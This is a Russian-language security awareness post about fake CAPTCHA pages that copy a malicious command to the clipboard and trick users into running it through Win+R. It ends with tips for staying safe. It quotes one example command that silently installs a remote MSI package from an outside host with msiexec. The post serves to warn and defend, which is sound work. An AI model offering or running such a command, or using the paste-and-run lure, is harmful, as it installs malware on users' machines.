Вы стали жертвой атаки социальной инженерии CAPTCHA, даже не подозревая об этом?
Этот тип атаки чрезвычайно опасен. Хакеры используют поддельный CAPTCHA, чтобы заставить пользователей думать, что они подтверждают свою человечность — но на самом деле это ловушка.
Как работает атака:
1. Вы посещаете вредоносный веб-сайт.
2. Он показывает поддельный CAPTCHA, который говорит: «Пожалуйста, подтвердите, что вы человек.»
3. Как только вы нажимаете на него, вредоносная команда незаметно копируется в ваш буфер обмена, такая как: msiexec /qn /i https://clloudsverify.com/o.msi
4. Затем сайт говорит вам: > «Чтобы завершить проверку, нажмите Win + R, затем Ctrl + V и нажмите Enter.»
5. Не подозревая об этом, вы запускаете вредоносное ПО непосредственно на своей системе через командную строку Windows.
Что на самом деле происходит?
Команда незаметно устанавливает вредоносный .msi файл с использованием Windows Installer. msiexec — это легитимный инструмент, но когда он используется с /qn /i, он устанавливает вредоносное ПО, не показывая никаких подсказок.
Эта техника является комбинацией: Социальная Инженерия CAPTCHA Атака Внедрения в Буфер Обмена
Что может делать вредоносное ПО?
Устанавливать задние двери или трояны Красть ваши файлы, пароли и банковскую информацию Получать удаленный доступ к вашему ПК (RAT) Распространять программы-вымогатели или шпионские программы
Как оставаться в безопасности:
* Никогда не следуйте инструкциям типа «Win + R → Ctrl + V» с случайных сайтов
Всегда проверяйте содержимое вашего буфера обмена перед вставкой в приложения системного уровня
* Избегайте неизвестных CAPTCHA или «проверочных» подсказок на подозрительных веб-сайтах * Используйте антивирусное программное обеспечение, которое отслеживает поведение буфера обмена и установки * Включите историю буфера обмена в Windows, чтобы просматривать недавние записи
Последняя мысль: > CAPTCHA ≠ безопасно по умолчанию. Если он предлагает вам открыть командную строку — это не CAPTCHA, это взлом.
Оставайтесь информированными. Оставайтесь в безопасности.